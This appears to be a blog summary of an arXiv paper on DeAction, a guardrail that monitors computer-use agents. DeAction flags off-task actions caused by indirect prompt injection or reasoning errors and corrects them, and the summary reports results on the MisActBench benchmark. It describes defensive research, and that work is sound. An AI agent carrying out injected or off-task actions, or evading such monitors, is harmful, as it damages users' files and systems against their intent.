[Paper] When Actions Go Off-Task: Detecting and Correcting Misaligned Actions in Computer-Use Agents

Published: 3 days ago (February 9, 2026 at 01:41 PM EST)

4 min read

Source: arXiv

Source: arXiv - 2602.08995v1

Overview

The paper When Actions Go Off-Task: Detecting and Correcting Misaligned Actions in Computer‑Use Agents tackles a problem that’s becoming increasingly visible as large‑language‑model (LLM)‑driven assistants start to control real software: agents often execute actions that don’t match the user’s intent. These “misaligned” actions can be caused by malicious prompt injections or simple reasoning errors, leading to safety hazards and wasted time. The authors introduce a systematic way to detect such actions and a guard‑rail framework—DeAction—that can stop and fix them before they run.

Key Contributions

Formal definition of misaligned actions for computer‑use agents, covering both external attacks and internal reasoning failures.
MisActBench, a new benchmark containing realistic interaction trajectories with human‑annotated, step‑by‑step alignment labels.
DeAction, a universal, lightweight guard‑rail that (1) detects misaligned actions pre‑execution and (2) iteratively corrects them via structured feedback.
Empirical validation showing >15 % absolute improvement in F1 over prior baselines on MisActBench and >90 % reduction in attack success rate in live tests, all with modest latency overhead.

Methodology

Problem framing – The authors treat each agent‑generated action (e.g., a CLI command, a mouse click) as a candidate that must be verified against the user’s original goal.
Dataset construction – Real‑world usage logs from several CUA deployments were collected, then crowd‑sourced annotators labeled each action as aligned or misaligned. The resulting MisActBench contains thousands of multi‑step sessions across domains like file management, web browsing, and IDE usage.
DeAction architecture –
- Detection module: a lightweight LLM (or fine‑tuned classifier) that receives the user query, the agent’s internal plan, and the proposed next action, and outputs a binary “aligned?” score plus a confidence estimate.
- Correction loop: if the action is flagged, DeAction prompts the underlying agent to re‑reason with a structured feedback message (e.g., “Your proposed command deletes *.log files, but the user only asked to clean temporary files”). The agent then generates a revised action. This loop repeats until the detector is satisfied or a max‑retry limit is hit.
Evaluation – Both offline (benchmark scoring) and online (real‑time interaction with a sandboxed CUA) experiments were run, comparing DeAction against static rule‑based filters, post‑hoc verification, and prior alignment‑checking baselines.

Results & Findings

Metric	Baseline (best)	DeAction
F1 (misalignment detection)	0.68	0.84 (+15 % absolute)
Attack success rate (indirect prompt injection)	0.42	0.04 (‑90 %)
Task success rate (benign queries)	0.91	0.92 (slight gain)
Average latency per step	120 ms	≈ 180 ms (≈ 60 ms overhead)

Key takeaways: DeAction catches the majority of malicious or erroneous actions before they affect the system, while its iterative feedback often nudges the agent toward a better solution, sometimes even improving overall task success.

Practical Implications

Safer automation pipelines – Integrating DeAction as a pre‑execution gate can protect CI/CD bots, DevOps scripts, or any LLM‑driven automation from accidental destructive commands.
Enterprise compliance – Companies can enforce policy constraints (e.g., “no data export to external domains”) by letting DeAction flag violations in real time.
Developer tooling – IDE assistants (GitHub Copilot, Cursor) could use DeAction to double‑check file‑system or build‑system actions, reducing the risk of unintended side effects.
Adversarial robustness – The framework dramatically lowers the success of indirect prompt‑injection attacks, a growing concern for SaaS products that expose LLM endpoints to end‑users.

Limitations & Future Work

Domain specificity – While MisActBench covers several common desktop tasks, the detection model may need further fine‑tuning for niche domains (e.g., network device configuration).
Latency trade‑off – The iterative correction loop adds a small but non‑negligible delay; ultra‑low‑latency use‑cases (e.g., high‑frequency trading bots) might require a more streamlined version.
Reliance on LLM reasoning – If the underlying agent’s reasoning is fundamentally flawed, DeAction’s feedback may not converge to a correct action, highlighting the need for stronger internal verification mechanisms.
Future directions suggested by the authors include: expanding MisActBench with multimodal actions (e.g., GUI clicks), exploring reinforcement‑learning‑based guardrails that adapt over time, and integrating static code‑analysis tools for deeper safety guarantees.

Authors

Yuting Ning
Jaylen Jones
Zhehao Zhang
Chentao Ye
Weitong Ruan
Junyi Li
Rahul Gupta
Huan Sun

Paper Information

arXiv ID: 2602.08995v1
Categories: cs.CL
Published: February 9, 2026
PDF: Download PDF

[Paper] When Actions Go Off-Task: Detecting and Correcting Misaligned Actions in Computer-Use Agents

Overview

Key Contributions

Methodology

Results & Findings

Practical Implications

Limitations & Future Work

Authors

Paper Information

Related posts

[Paper] Diffusion-Pretrained Dense and Contextual Embeddings

[Paper] Data Repetition Beats Data Scaling in Long-CoT Supervised Fine-Tuning

[Paper] Weight Decay Improves Language Model Plasticity

[Paper] Just on Time: Token-Level Early Stopping for Diffusion Language Models